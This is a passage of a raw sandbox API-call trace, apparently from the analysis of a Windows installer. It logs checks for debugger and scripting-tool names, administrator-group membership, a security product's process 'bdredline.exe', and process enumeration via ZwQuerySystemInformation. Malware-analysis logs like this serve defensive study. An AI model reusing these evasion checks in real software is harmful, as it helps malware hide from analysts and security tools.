lpString1=0x321ba8, lpString2="3326528" | out: lpString1="3326528") returned="3326528" [0158.092] lstrcpyA (in: lpString1=0x431800, lpString2="1068" | out: 
lpString1="1068") returned="1068" [0158.092] lstrcpyA (in: lpString1=0x430800, lpString2="3327992" | out: lpString1="3327992") returned="3327992" [0158.092] lstrcpyA (in: lpString1=0x431000, lpString2="1488" | out: lpString1="1488") returned="1488" [0158.092] lstrcpyA (in: lpString1=0x321ba8, lpString2="3328016" | out: lpString1="3328016") returned="3328016" [0158.092] lstrcpyA (in: lpString1=0x431800, lpString2="1564" | out: lpString1="1564") returned="1564" [0158.092] lstrcpyA (in: lpString1=0x430800, lpString2="3328840" | out: lpString1="3328840") returned="3328840" [0158.092] lstrcpyA (in: lpString1=0x431000, lpString2="856" | out: lpString1="856") returned="856" [0158.092] lstrcpyA (in: lpString1=0x321ba8, lpString2="3328872" | out: lpString1="3328872") returned="3328872" [0158.093] lstrcpyA (in: lpString1=0x431800, lpString2="1632" | out: lpString1="1632") returned="1632" [0158.093] lstrcpyA (in: lpString1=0x430800, lpString2="3329376" | out: lpString1="3329376") returned="3329376" [0158.093] lstrcpyA (in: lpString1=0x431000, lpString2="528" | out: lpString1="528") returned="528" [0158.093] lstrcpyA (in: lpString1=0x321ba8, lpString2="3329400" | out: lpString1="3329400") returned="3329400" [0158.093] lstrcpyA (in: lpString1=0x431800, lpString2="1648" | out: lpString1="1648") returned="1648" [0158.093] lstrcpyA (in: lpString1=0x430800, lpString2="3329968" | out: lpString1="3329968") returned="3329968" [0158.093] lstrcpyA (in: lpString1=0x431000, lpString2="584" | out: lpString1="584") returned="584" [0158.093] lstrcpyA (in: lpString1=0x321ba8, lpString2="3329984" | out: lpString1="3329984") returned="3329984" [0158.093] lstrcpyA (in: lpString1=0x431800, lpString2="1664" | out: lpString1="1664") returned="1664" [0158.093] lstrcpyA (in: lpString1=0x430800, lpString2="3332088" | out: lpString1="3332088") returned="3332088" [0158.093] lstrcpyA (in: lpString1=0x431000, lpString2="2136" | out: lpString1="2136") returned="2136" [0158.094] lstrcpyA (in: 
lpString1=0x321ba8, lpString2="3332120" | out: lpString1="3332120") returned="3332120" [0158.094] lstrcpyA (in: lpString1=0x431800, lpString2="1748" | out: lpString1="1748") returned="1748" [0158.094] lstrcpyA (in: lpString1=0x430800, lpString2="3332624" | out: lpString1="3332624") returned="3332624" [0158.094] lstrcpyA (in: lpString1=0x431000, lpString2="528" | out: lpString1="528") returned="528" [0158.094] lstrcpyA (in: lpString1=0x321ba8, lpString2="3332648" | out: lpString1="3332648") returned="3332648" [0158.094] lstrcpyA (in: lpString1=0x431800, lpString2="1192" | out: lpString1="1192") returned="1192" [0158.094] lstrcpyA (in: lpString1=0x430800, lpString2="3334112" | out: lpString1="3334112") returned="3334112" [0158.094] lstrcpyA (in: lpString1=0x431000, lpString2="1488" | out: lpString1="1488") returned="1488" [0158.094] lstrcpyA (in: lpString1=0x321ba8, lpString2="3334136" | out: lpString1="3334136") returned="3334136" [0158.094] lstrcpyA (in: lpString1=0x431800, lpString2="1612" | out: lpString1="1612") returned="1612" [0158.094] lstrcpyA (in: lpString1=0x430800, lpString2="3334960" | out: lpString1="3334960") returned="3334960" [0158.094] lstrcpyA (in: lpString1=0x431000, lpString2="856" | out: lpString1="856") returned="856" [0158.095] lstrcpyA (in: lpString1=0x321ba8, lpString2="3334992" | out: lpString1="3334992") returned="3334992" [0158.095] lstrcpyA (in: lpString1=0x431800, lpString2="684" | out: lpString1="684") returned="684" [0158.095] lstrcpyA (in: lpString1=0x430800, lpString2="3335304" | out: lpString1="3335304") returned="3335304" [0158.095] lstrcpyA (in: lpString1=0x431000, lpString2="360" | out: lpString1="360") returned="360" [0158.095] lstrcpyA (in: lpString1=0x321ba8, lpString2="3335352" | out: lpString1="3335352") returned="3335352" [0158.095] lstrcpyA (in: lpString1=0x431800, lpString2="528" | out: lpString1="528") returned="528" [0158.095] lstrcpyA (in: lpString1=0x430800, lpString2="3335664" | out: lpString1="3335664") 
returned="3335664" [0158.095] lstrcpyA (in: lpString1=0x431000, lpString2="328" | out: lpString1="328") returned="328" [0158.095] lstrcpyA (in: lpString1=0x321ba8, lpString2="3335680" | out: lpString1="3335680") returned="3335680" [0158.095] lstrcpyA (in: lpString1=0x431800, lpString2="1852" | out: lpString1="1852") returned="1852" [0158.095] lstrcpyA (in: lpString1=0x430800, lpString2="3335992" | out: lpString1="3335992") returned="3335992" [0158.095] lstrcpyA (in: lpString1=0x431000, lpString2="352" | out: lpString1="352") returned="352" [0158.096] lstrcpyA (in: lpString1=0x321ba8, lpString2="3336032" | out: lpString1="3336032") returned="3336032" [0158.096] lstrcpyA (in: lpString1=0x431800, lpString2="1428" | out: lpString1="1428") returned="1428" [0158.096] lstrcpyA (in: lpString1=0x430800, lpString2="3336344" | out: lpString1="3336344") returned="3336344" [0158.096] lstrcpyA (in: lpString1=0x431000, lpString2="360" | out: lpString1="360") returned="360" [0158.096] lstrcpyA (in: lpString1=0x321ba8, lpString2="3336392" | out: lpString1="3336392") returned="3336392" [0158.096] lstrcpyA (in: lpString1=0x431800, lpString2="2000" | out: lpString1="2000") returned="2000" [0158.096] lstrcpyA (in: lpString1=0x430800, lpString2="3336704" | out: lpString1="3336704") returned="3336704" [0158.096] lstrcpyA (in: lpString1=0x431000, lpString2="384" | out: lpString1="384") returned="384" [0158.096] lstrcpyA (in: lpString1=0x321ba8, lpString2="3336776" | out: lpString1="3336776") returned="3336776" [0158.096] lstrcpyA (in: lpString1=0x431800, lpString2="1088" | out: lpString1="1088") returned="1088" [0158.096] lstrcpyA (in: lpString1=0x430800, lpString2="3337088" | out: lpString1="3337088") returned="3337088" [0158.097] lstrcpyA (in: lpString1=0x431000, lpString2="344" | out: lpString1="344") returned="344" [0158.097] lstrcpyA (in: lpString1=0x321ba8, lpString2="3337120" | out: lpString1="3337120") returned="3337120" [0158.097] lstrcpyA (in: lpString1=0x431800, lpString2="860" 
| out: lpString1="860") returned="860" [0158.097] lstrcpyA (in: lpString1=0x430800, lpString2="3337432" | out: lpString1="3337432") returned="3337432" [0158.097] lstrcpyA (in: lpString1=0x431000, lpString2="344" | out: lpString1="344") returned="344" [0158.097] lstrcpyA (in: lpString1=0x321ba8, lpString2="3337464" | out: lpString1="3337464") returned="3337464" [0158.097] lstrcpyA (in: lpString1=0x431800, lpString2="560" | out: lpString1="560") returned="560" [0158.097] lstrcpyA (in: lpString1=0x430800, lpString2="3337776" | out: lpString1="3337776") returned="3337776" [0158.097] lstrcpyA (in: lpString1=0x431000, lpString2="328" | out: lpString1="328") returned="328" [0158.097] lstrcpyA (in: lpString1=0x321ba8, lpString2="3337792" | out: lpString1="3337792") returned="3337792" [0158.097] lstrcpyA (in: lpString1=0x431800, lpString2="1216" | out: lpString1="1216") returned="1216" [0158.098] lstrcpyA (in: lpString1=0x430800, lpString2="3338104" | out: lpString1="3338104") returned="3338104" [0158.098] lstrcpyA (in: lpString1=0x431000, lpString2="384" | out: lpString1="384") returned="384" [0158.098] lstrcpyA (in: lpString1=0x321ba8, lpString2="3338176" | out: lpString1="3338176") returned="3338176" [0158.098] lstrcpyA (in: lpString1=0x431800, lpString2="1180" | out: lpString1="1180") returned="1180" [0158.098] lstrcpyA (in: lpString1=0x430800, lpString2="3338488" | out: lpString1="3338488") returned="3338488" [0158.098] lstrcpyA (in: lpString1=0x431000, lpString2="360" | out: lpString1="360") returned="360" [0158.098] lstrcpyA (in: lpString1=0x321ba8, lpString2="3338536" | out: lpString1="3338536") returned="3338536" [0158.098] lstrcpyA (in: lpString1=0x431800, lpString2="328" | out: lpString1="328") returned="328" [0158.098] lstrcpyA (in: lpString1=0x430800, lpString2="3338848" | out: lpString1="3338848") returned="3338848" [0158.098] lstrcpyA (in: lpString1=0x431000, lpString2="352" | out: lpString1="352") returned="352" [0158.098] lstrcpyA (in: lpString1=0x321ba8, 
lpString2="3338888" | out: lpString1="3338888") returned="3338888" [0158.099] lstrcpyA (in: lpString1=0x431800, lpString2="564" | out: lpString1="564") returned="564" [0158.099] lstrcpyA (in: lpString1=0x430800, lpString2="3339200" | out: lpString1="3339200") returned="3339200" [0158.099] lstrcpyA (in: lpString1=0x431000, lpString2="352" | out: lpString1="352") returned="352" [0158.099] lstrcpyA (in: lpString1=0x321ba8, lpString2="3339240" | out: lpString1="3339240") returned="3339240" [0158.099] lstrcpyA (in: lpString1=0x431800, lpString2="1276" | out: lpString1="1276") returned="1276" [0158.099] lstrcpyA (in: lpString1=0x430800, lpString2="3339552" | out: lpString1="3339552") returned="3339552" [0158.099] lstrcpyA (in: lpString1=0x431000, lpString2="336" | out: lpString1="336") returned="336" [0158.099] lstrcpyA (in: lpString1=0x321ba8, lpString2="3339576" | out: lpString1="3339576") returned="3339576" [0158.099] lstrcpyA (in: lpString1=0x431800, lpString2="1392" | out: lpString1="1392") returned="1392" [0158.099] lstrcpyA (in: lpString1=0x430800, lpString2="3339888" | out: lpString1="3339888") returned="3339888" [0158.099] lstrcpyA (in: lpString1=0x431000, lpString2="352" | out: lpString1="352") returned="352" [0158.100] lstrcpyA (in: lpString1=0x321ba8, lpString2="3339928" | out: lpString1="3339928") returned="3339928" [0158.100] lstrcpyA (in: lpString1=0x431800, lpString2="712" | out: lpString1="712") returned="712" [0158.100] lstrcpyA (in: lpString1=0x430800, lpString2="3340240" | out: lpString1="3340240") returned="3340240" [0158.100] lstrcpyA (in: lpString1=0x431000, lpString2="368" | out: lpString1="368") returned="368" [0158.100] lstrcpyA (in: lpString1=0x321ba8, lpString2="3340296" | out: lpString1="3340296") returned="3340296" [0158.100] lstrcpyA (in: lpString1=0x431800, lpString2="1744" | out: lpString1="1744") returned="1744" [0158.100] lstrcpyA (in: lpString1=0x430800, lpString2="3340608" | out: lpString1="3340608") returned="3340608" [0158.100] 
lstrcpyA (in: lpString1=0x431000, lpString2="360" | out: lpString1="360") returned="360" [0158.100] lstrcpyA (in: lpString1=0x321ba8, lpString2="3340656" | out: lpString1="3340656") returned="3340656" [0158.101] strstr (_Str="0", _SubStr="perl") returned 0x0 [0158.101] strstr (_Str="0", _SubStr="python") returned 0x0 [0158.101] strstr (_Str="0", _SubStr="autoit") returned 0x0 [0158.103] strstr (_Str="0", _SubStr="ollydbg") returned 0x0 [0158.103] strstr (_Str="0", _SubStr="immunitydebugger") returned 0x0 [0158.365] GetProcAddress (hModule=0x75700000, lpProcName="GetAccountType") returned 0x75701215 [0158.365] GetVersion () returned 0x1db10106 [0158.365] GetCurrentThread () returned 0xfffffffe [0158.365] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x8, OpenAsSelf=0, TokenHandle=0x18f7c4 | out: TokenHandle=0x18f7c4*=0x0) returned 0 [0158.365] GetCurrentProcess () returned 0xffffffff [0158.365] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x18f7c4 | out: TokenHandle=0x18f7c4*=0x190) returned 1 [0158.365] GetModuleHandleA (lpModuleName="ADVAPI32") returned 0x76650000 [0158.365] GetProcAddress (hModule=0x76650000, lpProcName="CheckTokenMembership") returned 0x7665df04 [0158.365] AllocateAndInitializeSid (in: pIdentifierAuthority=0x18f7a8, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x221, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x18f7b8 | out: pSid=0x18f7b8*=0x3213e0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0158.365] CheckTokenMembership (in: TokenHandle=0x0, SidToCheck=0x3213e0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x18f7bc | out: IsMember=0x18f7bc) returned 1 [0158.366] 
AllocateAndInitializeSid (in: pIdentifierAuthority=0x18f7a8, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x222, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x18f7b8 | out: pSid=0x18f7b8*=0x3213e0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0158.366] CheckTokenMembership (in: TokenHandle=0x0, SidToCheck=0x3213e0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x18f7bc | out: IsMember=0x18f7bc) returned 1 [0158.366] AllocateAndInitializeSid (in: pIdentifierAuthority=0x18f7a8, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x223, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x18f7b8 | out: pSid=0x18f7b8*=0x3213e0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0158.366] CheckTokenMembership (in: TokenHandle=0x0, SidToCheck=0x3213e0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x18f7bc | out: IsMember=0x18f7bc) returned 1 [0158.366] AllocateAndInitializeSid (in: pIdentifierAuthority=0x18f7a8, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x18f7b8 | out: pSid=0x18f7b8*=0x3213e0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0158.366] CheckTokenMembership 
(in: TokenHandle=0x0, SidToCheck=0x3213e0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x18f7bc | out: IsMember=0x18f7bc) returned 1 [0158.366] CloseHandle (hObject=0x190) returned 1 [0158.367] lstrcpynA (in: lpString1=0x33611c, lpString2="User", iMaxLength=1024 | out: lpString1="User") returned="User" [0158.367] FreeLibrary (hLibModule=0x75700000) returned 1 [0158.367] lstrcpynA (in: lpString1=0x432c00, lpString2="User", iMaxLength=1024 | out: lpString1="User") returned="User" [0158.367] lstrcpynA (in: lpString1=0x42e3a0, lpString2="User", iMaxLength=1024 | out: lpString1="User") returned="User" [0158.367] lstrlenA (lpString="User") returned 4 [0158.367] lstrcpynA (in: lpString1=0x40ac18, lpString2="User", iMaxLength=1024 | out: lpString1="User") returned="User" [0158.367] lstrcpynA (in: lpString1=0x40b018, lpString2="Admin", iMaxLength=1024 | out: lpString1="Admin") returned="Admin" [0158.367] lstrcmpiA (lpString1="User", lpString2="Admin") returned 1 [0158.367] lstrcpynA (in: lpString1=0x33611c, lpString2="bdredline.exe", iMaxLength=1024 | out: lpString1="bdredline.exe") returned="bdredline.exe" [0158.367] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.367] lstrlenA (lpString="") returned 0 [0158.367] lstrcpynA (in: lpString1=0x336564, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.367] lstrcpynA (in: lpString1=0x40a418, lpString2="bdredline.exe", iMaxLength=1024 | out: lpString1="bdredline.exe") returned="bdredline.exe" [0158.367] lstrcpynA (in: lpString1=0x33611c, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.368] lstrcpynA (in: lpString1=0x336564, lpString2="bdredline.exe", iMaxLength=1024 | out: lpString1="bdredline.exe") returned="bdredline.exe" [0158.368] lstrcpynA (in: lpString1=0x430000, lpString2="bdredline.exe", iMaxLength=1024 | out: 
lpString1="bdredline.exe") returned="bdredline.exe" [0158.368] lstrcpynA (in: lpString1=0x42e3a0, lpString2="384", iMaxLength=1024 | out: lpString1="384") returned="384" [0158.368] lstrlenA (lpString="384") returned 3 [0158.368] lstrcpynA (in: lpString1=0x336564, lpString2="384", iMaxLength=1024 | out: lpString1="384") returned="384" [0158.368] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.368] lstrlenA (lpString="") returned 0 [0158.368] lstrcpynA (in: lpString1=0x3369ac, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.368] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.368] lstrlenA (lpString="") returned 0 [0158.368] lstrcpynA (in: lpString1=0x336df4, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.368] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.368] lstrlenA (lpString="") returned 0 [0158.368] lstrcpynA (in: lpString1=0x33723c, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.368] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.368] lstrlenA (lpString="") returned 0 [0158.368] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.368] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.368] lstrlenA (lpString="") returned 0 [0158.368] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.368] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.368] lstrlenA (lpString="") returned 0 [0158.368] lstrcpynA (in: lpString1=0x337f14, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.368] lstrcpynA (in: lpString1=0x42e3a0, lpString2="bdredline.exe", 
iMaxLength=1024 | out: lpString1="bdredline.exe") returned="bdredline.exe" [0158.368] lstrlenA (lpString="bdredline.exe") returned 13 [0158.368] lstrcpynA (in: lpString1=0x40a418, lpString2="bdredline.exe,", iMaxLength=1024 | out: lpString1="bdredline.exe,") returned="bdredline.exe," [0158.369] lstrlenA (lpString="bdredline.exe,") returned 14 [0158.369] lstrcpynA (in: lpString1=0x430400, lpString2="bdredline.exe,", iMaxLength=1024 | out: lpString1="bdredline.exe,") returned="bdredline.exe," [0158.369] lstrcpynA (in: lpString1=0x40a418, lpString2="65536", iMaxLength=1024 | out: lpString1="65536") returned="65536" [0158.369] lstrlenA (lpString="65536") returned 5 [0158.369] lstrcpynA (in: lpString1=0x430800, lpString2="65536", iMaxLength=1024 | out: lpString1="65536") returned="65536" [0158.369] lstrcpynA (in: lpString1=0x33835c, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.369] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.369] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.369] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.369] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.369] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.369] lstrcpynA (in: lpString1=0x40b018, 
lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.369] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.369] lstrcpynA (in: lpString1=0x42e3a0, lpString2="65536", iMaxLength=1024 | out: lpString1="65536") returned="65536" [0158.369] lstrlenA (lpString="65536") returned 5 [0158.369] lstrcpynA (in: lpString1=0x3387a4, lpString2="65536", iMaxLength=1024 | out: lpString1="65536") returned="65536" [0158.369] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.369] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.369] lstrcpynA (in: lpString1=0x40a418, lpString2="Alloc", iMaxLength=1024 | out: lpString1="Alloc") returned="Alloc" [0158.370] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.370] GetProcAddress (hModule=0x75710000, lpProcName="Alloc") returned 0x75711000 [0158.370] wsprintfA (in: param_1=0x18f5a4, param_2="%d" | out: param_1="3297464") returned 7 [0158.370] lstrcpynA (in: lpString1=0x3387a4, lpString2="3297464", iMaxLength=1024 | out: lpString1="3297464") 
returned="3297464" [0158.370] lstrcpynA (in: lpString1=0x430c00, lpString2="3297464", iMaxLength=1024 | out: lpString1="3297464") returned="3297464" [0158.370] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.370] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.370] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.370] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.370] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.370] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.370] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.370] lstrcpynA (in: lpString1=0x42e3c7, lpString2="3297464", iMaxLength=1024 | out: lpString1="3297464") returned="3297464" [0158.370] lstrlenA (lpString="3297464") returned 7 [0158.370] 
lstrcpynA (in: lpString1=0x42e3d2, lpString2="65536", iMaxLength=1024 | out: lpString1="65536") returned="65536" [0158.370] lstrlenA (lpString="65536") returned 5 [0158.371] lstrcpynA (in: lpString1=0x3387a4, lpString2="ntdll::ZwQuerySystemInformation(i 5, i 3297464, i 65536, i 0) i .r0", iMaxLength=1024 | out: lpString1="ntdll::ZwQuerySystemInformation(i 5, i 3297464, i 65536, i 0) i .r0") returned="ntdll::ZwQuerySystemInformation(i 5, i 3297464, i 65536, i 0) i .r0" [0158.371] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.371] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.371] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.371] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.371] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.371] lstrcpyA (in: lpString1=0x33f9d0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.371] lstrcpyA (in: lpString1=0x33e108, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.371] lstrcpyA (in: lpString1=0x33e508, lpString2="ZwQuerySystemInformation" | out: lpString1="ZwQuerySystemInformation") returned="ZwQuerySystemInformation" [0158.371] lstrcpynA (in: lpString1=0x33f5c8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.372] wsprintfA (in: param_1=0x33f5c8, param_2="%d" | out: param_1="0") returned 1 [0158.372] wsprintfA (in: 
param_1=0x33f5c8, param_2="%d" | out: param_1="65536") returned 5 [0158.372] wsprintfA (in: param_1=0x33f5c8, param_2="%d" | out: param_1="3297464") returned 7 [0158.372] wsprintfA (in: param_1=0x33f5c8, param_2="%d" | out: param_1="5") returned 1 [0158.372] wsprintfA (in: param_1=0x33f5c8, param_2="%d" | out: param_1="0") returned 1 [0158.372] lstrcpyA (in: lpString1=0x430000, lpString2="0" | out: lpString1="0") returned="0" [0158.372] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.372] lstrlenA (lpString="0") returned 1 [0158.372] lstrcpynA (in: lpString1=0x40ac18, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.372] lstrcpynA (in: lpString1=0x40b018, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.372] lstrcmpiA (lpString1="0", lpString2="0") returned 0 [0158.372] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3297464", iMaxLength=1024 | out: lpString1="3297464") returned="3297464" [0158.372] lstrlenA (lpString="3297464") returned 7 [0158.372] lstrcpynA (in: lpString1=0x40a418, lpString2="3297464", iMaxLength=1024 | out: lpString1="3297464") returned="3297464" [0158.372] lstrlenA (lpString="3297464") returned 7 [0158.372] lstrcpynA (in: lpString1=0x431c00, lpString2="3297464", 